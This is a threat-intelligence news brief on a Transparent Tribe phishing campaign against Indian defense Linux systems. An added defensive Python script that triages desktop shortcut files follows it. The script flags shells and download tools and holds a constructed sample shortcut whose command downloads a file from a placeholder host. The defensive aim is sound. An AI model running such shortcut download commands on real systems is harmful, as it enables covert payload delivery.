Threat Intelligence, Phishing

New Transparent Tribe attacks target Indian defense sector’s Linux systems


Indian defense organizations with systems running on Bharat Operating System Solutions Linux have been targeted by Pakistan-linked threat operation Transparent Tribe, also known as APT36, as part of a new cyberespionage campaign initially detected in early June, according to Hackread.

Intrusions begin with phishing emails carrying a compressed file that contains a malicious shortcut file. The shortcut triggers the appearance of a seemingly normal PowerPoint file while downloading and executing the malicious BOSS.elf program, which seeks to infiltrate the host system, a report from Cyfirma showed. The multi-stage campaign, which sought to ensure clandestine compromise, was noted to be indicative of Transparent Tribe's evolving capabilities, which should prompt the immediate implementation of robust threat detection systems and cybersecurity measures. "Prevention improves when BOSS Linux images disable the auto-execution of desktop shortcuts and enforce application-allow lists that limit what runs outside signed repositories," said Sectigo's Jason Soroko.
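For defenders triaging shortcut files pulled from mail attachments, the following added example (not code from Cyfirma, Sectigo or the original article) flags shortcuts whose launch command warrants review. It assumes the shortcut is a freedesktop `.desktop` entry, which the article does not state; the heuristics, names and sample files are constructed for illustration.

```python
import shlex
from pathlib import PurePosixPath

SHELLS = {"sh", "bash", "dash", "zsh"}                  # interpreters that accept -c
FETCHERS = {"curl", "wget"}                             # common download tools
DOC_EXTS = {".pptx", ".ppt", ".pdf", ".docx", ".xlsx"}  # document-looking names

def parse_desktop_entry(text):
    """Return key/value pairs from the [Desktop Entry] group only."""
    entry, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = (line == "[Desktop Entry]")
            continue
        if in_group and "=" in line:
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry

def triage(filename, text):
    """Return the reasons this shortcut deserves analyst review (assumed heuristics)."""
    entry, reasons = parse_desktop_entry(text), []
    if entry.get("Type") != "Application" or "Exec" not in entry:
        return reasons                      # Link/Directory entries launch nothing
    try:
        argv = shlex.split(entry["Exec"])
    except ValueError:
        return ["Exec line does not parse (unbalanced quotes)"]
    if not argv:
        return reasons
    if PurePosixPath(argv[0]).name in SHELLS and "-c" in argv[1:]:
        reasons.append("Exec runs an inline shell command")
    words = " ".join(argv).replace(";", " ").replace("|", " ").replace("&", " ").split()
    if {PurePosixPath(w).name for w in words} & FETCHERS:
        reasons.append("Exec invokes a download tool")
    stem = PurePosixPath(filename).stem     # "Notice.pptx.desktop" -> "Notice.pptx"
    if PurePosixPath(stem).suffix.lower() in DOC_EXTS:
        reasons.append("file name imitates a document")
    return reasons

# Constructed samples, not taken from the campaign.
SUSPECT = ('[Desktop Entry]\nType=Application\nName=Notice\n'
           'Exec=sh -c "curl -s -o /tmp/f http://example.invalid/f"\n')
BENIGN = "[Desktop Entry]\nType=Application\nName=Files\nExec=nautilus %U\n"
```

A non-empty result is a prompt for manual review rather than a verdict, since legitimate launchers sometimes wrap commands in a shell.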
